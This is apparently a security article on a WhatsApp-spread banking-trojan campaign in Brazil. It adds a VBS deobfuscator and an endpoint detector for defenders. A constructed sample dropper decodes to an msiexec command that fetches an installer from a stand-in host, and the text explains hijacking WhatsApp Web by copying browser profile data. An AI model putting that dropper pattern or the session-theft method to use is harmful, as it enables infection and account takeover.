Hackers Exploit WhatsApp for Malware Distribution in Sophisticated Brazilian Cyberattack

Hackers Exploit WhatsApp to Distribute Malware and Harvest Sensitive Data

A sophisticated malware campaign has recently emerged that targets Brazilian users. The initial lure arrives by email, but the campaign uses hijacked WhatsApp Web sessions as its propagation channel, relying on the trust recipients place in messages from their own contacts to spread banking trojans and harvest sensitive information.

Infection Mechanism

The campaign begins with phishing emails carrying ZIP-archived Visual Basic Script (VBS) files. The scripts hide their strings behind Chr()-based character construction and XOR encoding to evade signature-based detection. Once executed, the VBS script downloads and installs Python together with ChromeDriver and the Selenium package, giving the attacker a scriptable browser with which to drive WhatsApp Web.

The malware then injects JavaScript into the browser session it controls and calls WhatsApp Web's internal APIs to enumerate contacts and send further payloads. Rather than authenticating with a QR code, it reuses the victim's already-linked session: the browser's cookies, local storage and IndexedDB data are copied into a profile the attacker controls, and Chrome is started on that copy.

Technical Breakdown

The infection starts when victims receive phishing emails containing ZIP-archived VBS files. The scripts use character encoding and XOR obfuscation to defeat signature-based detection. Strings are never written in clear text; each one is built character by character from Chr() calls, and the numeric argument of each Chr() is first XORed with a fixed key that is itself present in the script. This is obfuscation rather than encryption: once the key is read off the script, every command can be recovered statically without running it.
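The Chr()/XOR construction just described can be undone statically. The deobfuscator below is an added example written for this page, not code from the campaign or from the researchers who analysed it. The VBS snippet it parses is a constructed stand-in that mimics the pattern (the XOR key 23, the variable names and the example.invalid URL are assumptions, not real indicators).

```python
"""Static deobfuscator for VBScript droppers that assemble strings from
Chr(n Xor k) / Chr(n) calls joined with '&'.  Added example, not the
campaign's own code; SAMPLE_VBS is a constructed stand-in for the dropper."""
import re

# One string-building token: Chr(<int> [Xor <int>]) or a "..." literal ("" escapes a quote)
TOKEN = r'Chr\(\s*\d+\s*(?:Xor\s*\d+)?\s*\)|"(?:[^"]|"")*"'
CHR_RE = re.compile(r'Chr\(\s*(\d+)\s*(?:Xor\s*(\d+))?\s*\)', re.IGNORECASE)
LIT_RE = re.compile(r'"((?:[^"]|"")*)"')
# A maximal run of tokens joined by '&' is one string expression
RUN_RE = re.compile(rf'(?:{TOKEN})(?:\s*&\s*(?:{TOKEN}))*', re.IGNORECASE)
# After folding, 'name = "literal"' is a constant we can inline into later lines
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*("(?:[^"]|"")*")\s*$')

# Constructed sample (key 23 and the URL are assumptions), not the real dropper
SAMPLE_VBS = '''\
' constructed sample in the style the article describes
Set o = CreateObject(Chr(64 Xor 23) & Chr(68 Xor 23) & Chr(116 Xor 23) & Chr(101 Xor 23) & Chr(126 Xor 23) & Chr(103 Xor 23) & Chr(99 Xor 23) & Chr(57 Xor 23) & Chr(68 Xor 23) & Chr(127 Xor 23) & Chr(114 Xor 23) & Chr(123 Xor 23) & Chr(123 Xor 23))
u = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & "example.invalid/a.msi"
o.Run Chr(122 Xor 23) & Chr(100 Xor 23) & Chr(126 Xor 23) & Chr(114 Xor 23) & Chr(111 Xor 23) & Chr(114 Xor 23) & Chr(116 Xor 23) & Chr(55 Xor 23) & Chr(56 Xor 23) & Chr(102 Xor 23) & Chr(121 Xor 23) & Chr(55 Xor 23) & Chr(56 Xor 23) & Chr(126 Xor 23) & Chr(55 Xor 23) & u, 0, True
'''


def vbs_literal(s: str) -> str:
    """Render text as a VBScript double-quoted literal."""
    return '"' + s.replace('"', '""') + '"'


def decode_run(run: str) -> str:
    """Evaluate one '&'-joined run of Chr()/literal tokens to plain text."""
    out = []
    for m in re.finditer(TOKEN, run, re.IGNORECASE):
        tok = m.group(0)
        cm = CHR_RE.fullmatch(tok)
        if cm:
            n = int(cm.group(1))
            if cm.group(2) is not None:
                n ^= int(cm.group(2))        # VBScript 'Xor' on integers
            out.append(chr(n & 0xFF))        # Chr() yields one byte-range character
        else:
            out.append(LIT_RE.fullmatch(tok).group(1).replace('""', '"'))
    return ''.join(out)


def fold_runs(line: str) -> str:
    """Replace every Chr()/literal run on the line with one plain literal."""
    return RUN_RE.sub(lambda m: vbs_literal(decode_run(m.group(0))), line)


def sub_outside_quotes(line: str, pattern: re.Pattern, repl) -> str:
    """Apply a substitution only to the parts of the line that are not string literals."""
    parts = re.split(r'("(?:[^"]|"")*")', line)
    return ''.join(p if i % 2 else pattern.sub(repl, p) for i, p in enumerate(parts))


def deobfuscate(script: str) -> str:
    """Pass 1 folds Chr() runs; pass 2 inlines variables that hold a single
    literal and folds again, so '"lit" & var' collapses into one string."""
    lines = [fold_runs(line) for line in script.splitlines()]
    consts = {}
    for line in lines:
        m = ASSIGN_RE.match(line)
        if m:
            consts[m.group(1)] = m.group(2)
    result = []
    for line in lines:
        if not ASSIGN_RE.match(line):
            for name, lit in consts.items():
                pat = re.compile(rf'(?<![\w.]){re.escape(name)}(?![\w(])', re.IGNORECASE)
                line = sub_outside_quotes(line, pat, lambda _m, lit=lit: lit)
            line = fold_runs(line)
        result.append(line)
    return '\n'.join(result)


def extract_strings(script: str) -> list:
    """All decoded literals in the deobfuscated script: the IOC candidates."""
    return [m.group(1).replace('""', '"') for m in LIT_RE.finditer(deobfuscate(script))]


if __name__ == "__main__":
    print(deobfuscate(SAMPLE_VBS))
    print(extract_strings(SAMPLE_VBS))
```

Run on the sample, `deobfuscate` returns the script with `CreateObject("WScript.Shell")` and the full `msiexec /qn /i http://...` command in clear text, and `extract_strings` lists the recovered strings for triage. The tool handles only the two constructs the article names (Chr() with an optional XOR, plus literal concatenation); a dropper that adds a further layer, for example passing the folded string to Execute(), needs the output fed back through the same routine.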

After deobfuscation, the script downloads two components: an MSI file and another VBS file. The downloaded VBS file contains identical obfuscation patterns and drops a batch script that installs Python, ChromeDriver, and Selenium packages. This automated setup creates the infrastructure needed for WhatsApp automation without requiring manual user intervention.

The Python script, named whats.py, takes over the victim's WhatsApp Web session by copying the browser profile data that holds it (cookies, local storage and IndexedDB files) to a temporary directory. It then launches a second Chrome instance through Selenium with Chrome's --user-data-dir switch pointed at that copy. Because WhatsApp Web's authentication state lives entirely in that profile data, the copied session is accepted as already linked, and the QR-code pairing step that would normally protect WhatsApp Web access never takes place. The copy is necessary because a running Chrome keeps its live profile directory locked; the practical consequence is that anything with read access to the profile on disk holds the equivalent of a logged-in WhatsApp credential.

Propagation and Persistence

Once the malware gains access to the victim’s WhatsApp Web session, it enumerates the contact list and sends malicious messages to all contacts, further propagating the infection. This method exploits the trust between contacts, increasing the likelihood of recipients opening the malicious attachments.

To persist on the infected system, the malware writes registry entries and continuously monitors the titles of active windows for banking-related keywords. When a targeted financial institution or cryptocurrency wallet application is detected, it decrypts its banking trojan and loads it directly into memory. The decrypted payload never touches disk, so file-based scanning sees only the encrypted blob; detection has to rely on process behaviour, memory scanning, or the earlier stages of the chain.
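The chain described in the preceding sections (script host dropping an MSI and a batch file, pip installing Selenium, Chrome relaunched by the automation stack on a profile copy in a temporary directory, and registry-based persistence) leaves distinct endpoint artifacts. The detector below is an added example, not code from the campaign or its analysts: it runs over constructed Sysmon-style process-creation and registry events in JSON lines; the field names are simplified, and the PIDs, paths and file names are assumptions rather than real indicators.

```python
"""Detection logic for the chain described above, run over constructed
Sysmon-style JSON events.  Added example; field names, PIDs, paths and file
names are assumptions, not the campaign's real indicators."""
import json
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
AUTOMATION_PARENTS = {"chromedriver.exe", "python.exe", "pythonw.exe"}
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\|%TEMP%|\\Windows\\Temp\\", re.IGNORECASE)
USER_DATA_DIR_RE = re.compile(r'--user-data-dir=("?)([^"\s]+)\1', re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
PIP_SELENIUM_RE = re.compile(r"\bpip\b.*\binstall\b.*\bselenium\b", re.IGNORECASE)

# Constructed events: PIDs 1100-1700 are the infection chain, 2000 and 2100 are benign look-alikes
SAMPLE_EVENTS = r'''
{"event":"ProcessCreate","pid":1100,"ppid":1000,"image":"C:\\Windows\\System32\\wscript.exe","command_line":"wscript.exe \"C:\\Users\\ana\\Downloads\\Fatura.vbs\""}
{"event":"ProcessCreate","pid":1200,"ppid":1100,"image":"C:\\Windows\\System32\\msiexec.exe","command_line":"msiexec /qn /i C:\\Users\\ana\\AppData\\Local\\Temp\\a.msi"}
{"event":"ProcessCreate","pid":1300,"ppid":1100,"image":"C:\\Windows\\System32\\cmd.exe","command_line":"cmd /c C:\\Users\\ana\\AppData\\Local\\Temp\\setup.bat"}
{"event":"ProcessCreate","pid":1400,"ppid":1300,"image":"C:\\Python312\\python.exe","command_line":"python.exe -m pip install selenium"}
{"event":"ProcessCreate","pid":1500,"ppid":1300,"image":"C:\\Python312\\python.exe","command_line":"python.exe C:\\Users\\ana\\AppData\\Local\\Temp\\whats.py"}
{"event":"ProcessCreate","pid":1600,"ppid":1500,"image":"C:\\Users\\ana\\AppData\\Local\\Temp\\chromedriver.exe","command_line":"chromedriver.exe --port=9515"}
{"event":"ProcessCreate","pid":1700,"ppid":1600,"image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","command_line":"chrome.exe --user-data-dir=C:\\Users\\ana\\AppData\\Local\\Temp\\wa_prof --enable-automation https://web.whatsapp.com"}
{"event":"RegistryValueSet","pid":1500,"image":"C:\\Python312\\python.exe","target_object":"HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater","details":"wscript.exe C:\\Users\\ana\\AppData\\Roaming\\up.vbs"}
{"event":"ProcessCreate","pid":2000,"ppid":1000,"image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","command_line":"chrome.exe https://web.whatsapp.com"}
{"event":"ProcessCreate","pid":2100,"ppid":1000,"image":"C:\\Python312\\python.exe","command_line":"python.exe -m pip install selenium"}
'''


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


class ProcessTree:
    """Minimal pid -> parent map so rules can look at ancestry, not just the direct parent."""
    def __init__(self):
        self.parent = {}   # pid -> ppid
        self.image = {}    # pid -> lowercase image name

    def add(self, ev: dict) -> None:
        self.parent[ev["pid"]] = ev["ppid"]
        self.image[ev["pid"]] = basename(ev["image"])

    def ancestors(self, pid: int):
        """Yield image names from the direct parent upward; '?' for processes never seen."""
        seen = set()
        while pid in self.parent and pid not in seen:
            seen.add(pid)
            pid = self.parent[pid]
            yield self.image.get(pid, "?")


def detect(jsonl: str) -> list:
    """Return (rule_name, pid) alerts for the chain's endpoint artifacts."""
    tree = ProcessTree()
    alerts = []
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        if ev["event"] == "ProcessCreate":
            tree.add(ev)
            img, cmd = basename(ev["image"]), ev["command_line"]
            anc = list(tree.ancestors(ev["pid"]))
            parent = anc[0] if anc else "?"
            # 1. a script host launching the MSI installer or a batch file
            if parent in SCRIPT_HOSTS and img in {"msiexec.exe", "cmd.exe"}:
                alerts.append(("script_host_spawns_installer", ev["pid"]))
            # 2. Selenium being installed somewhere below a script host (an IDE doing it is not)
            if img in {"python.exe", "pythonw.exe", "pip.exe"} and PIP_SELENIUM_RE.search(cmd) \
                    and SCRIPT_HOSTS & set(anc):
                alerts.append(("selenium_install_from_script", ev["pid"]))
            # 3. Chrome started by chromedriver/python on a profile copy under a temp directory
            m = USER_DATA_DIR_RE.search(cmd)
            if img == "chrome.exe" and parent in AUTOMATION_PARENTS and m and TEMP_DIR_RE.search(m.group(2)):
                alerts.append(("chrome_profile_copy_automation", ev["pid"]))
        elif ev["event"] == "RegistryValueSet":
            # 4. a Run/RunOnce value pointing at a script or a Python interpreter
            if RUN_KEY_RE.search(ev["target_object"]) and re.search(r"\.(vbs|bat|py)\b|python", ev["details"], re.I):
                alerts.append(("run_key_script_persistence", ev["pid"]))
    return alerts


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:32} pid={pid}")
```

On the sample the chain produces five alerts, one per stage, while the benign Chrome launch (PID 2000) and a pip install of Selenium that has no script host in its ancestry (PID 2100) stay quiet. The third rule is the one specific to this campaign: a legitimate Chrome session on web.whatsapp.com and an attacker-driven one differ in the launching process and in where the profile directory sits, not in their network traffic. These rules only see the launch of the copied profile, not the copy itself; if your telemetry records file reads, a non-Chrome process reading the Chrome `User Data` directory is the earlier signal.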

Implications and Recommendations

This campaign underscores the evolving tactics of cybercriminals who exploit widely used communication platforms like WhatsApp to distribute malware. By automating interactions with WhatsApp Web and leveraging existing user sessions, attackers can silently propagate malware and harvest sensitive information without raising immediate suspicion.

Users are advised to treat unsolicited attachments with caution even when they arrive from a known contact, since this campaign sends its lures from the compromised contact's own WhatsApp account. Anyone who suspects their session has been hijacked should review the entries under WhatsApp's Linked devices setting on the phone and log out any they do not recognise, which invalidates the stolen web session. Robust endpoint protection, up-to-date software, and phishing awareness training remain the baseline controls.

Organizations should also look for the chain's endpoint artifacts rather than relying on network monitoring alone, because the automated traffic goes to the legitimate WhatsApp Web service over TLS and is hard to tell from normal use. Useful signals include a script host (wscript.exe or cscript.exe) spawning msiexec.exe or a batch file, pip installing Selenium on a user workstation, chrome.exe launched by chromedriver or python with a --user-data-dir under a temporary directory, and processes other than Chrome reading the Chrome profile directory.